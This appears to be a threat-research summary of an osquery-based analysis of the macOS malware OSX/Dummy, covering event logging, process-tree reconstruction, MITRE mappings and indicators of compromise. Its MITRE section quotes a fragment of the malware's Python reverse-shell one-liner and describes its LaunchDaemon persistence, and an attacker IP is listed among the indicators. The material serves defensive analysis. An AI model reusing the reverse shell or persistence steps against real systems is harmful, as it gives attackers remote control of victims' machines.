Threat Research

Mac malware analysis using osquery

Securonix

Osquery turns the OS into a SQL database to enable cross-platform malware analysis, and this post demonstrates how to use it for macOS malware analysis (OSX/Dummy). It also compares osquery with sandboxing and walks through a real-world analysis showing how to enable event logging, reconstruct a process tree, and trace artifacts left by OSX/Dummy. #osquery #OSXDummy #LaunchDaemons #com.startup.plist #Xpcproxy #Python #UnixShell

Keypoints

  • Osquery exposes the operating system as a SQL database, enabling malware analysis and intrusion detection across platforms (e.g., macOS in this article).
  • Compared to sandboxing, osquery can record file, socket, and process events, but building a full parent-child process tree requires extra steps.
  • Event collection in osquery is not enabled by default and requires a configuration change to audit/process events for analysis.
  • The OSX/Dummy malware analysis demonstrates enabling process events, using osqueryi to inspect process_events, and deriving a process tree from pid/parent relationships.
  • The analysis reveals specific malware artifacts and behaviors: writing a script, moving it, adjusting ownership/permissions, using launchd/LaunchDaemons for persistence, and executing via launchctl and Xpcproxy.
  • The workflow includes exporting line-mode SQL results and a Python script to reconstruct the parent-child process relationships, illustrating a practical osquery-based dynamic analysis on macOS.

MITRE Techniques

  • [T1543.003] Create or Modify System Process: Launch Daemons – The malware adds a property list file in /Library/LaunchDaemons/ for persistence and uses LaunchDaemons/Launchd to run the script. ‘For persistence, this malware added a property list file in /Library/LaunchDaemons/.’
  • [T1218.005] Signed Binary Proxy Execution: XPC – Xpcproxy launches the script.sh. ‘Xpcproxy launches the script.sh’
  • [T1059.006] Command and Scripting Interpreter: Python – The Python reverse shell is invoked via a -c payload. ‘python -c import socket,subprocess,os; s=socket.socket(…); p=subprocess.call([“/bin/sh”,”-i”]);’
  • [T1059.004] Command and Scripting Interpreter: Unix Shell – The malware uses /bin/sh -i as part of the reverse shell. ‘p=subprocess.call([“/bin/sh”,”-i”])’
  • [T1057] Process Discovery – The malware uses the ps command to list the running processes. ‘The malware uses the ps command to list the running processes’
  • [T1222] File and Directory Permissions Modification – The malware changes the ownership of the script to root using chown. ‘The malware changes the ownership of the script to root using chown command’
  • [T1569.002] System Services: Service Execution – The malware uses launchctl to run the script.sh (com.startup.plist is for script.sh). ‘The malware uses the launchctl to run the script.sh’

Indicators of Compromise

  • [File] context – /tmp/script.sh, /var/root/script.sh, and /Library/LaunchDaemons/com.startup.plist
  • [Directory] context – /Library/LaunchDaemons/
  • [File] context – /etc/security/audit_control
  • [IP Address] context – 185.243.115.230

Read more: https://www.uptycs.com/blog/malware-analysis-using-osquery

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint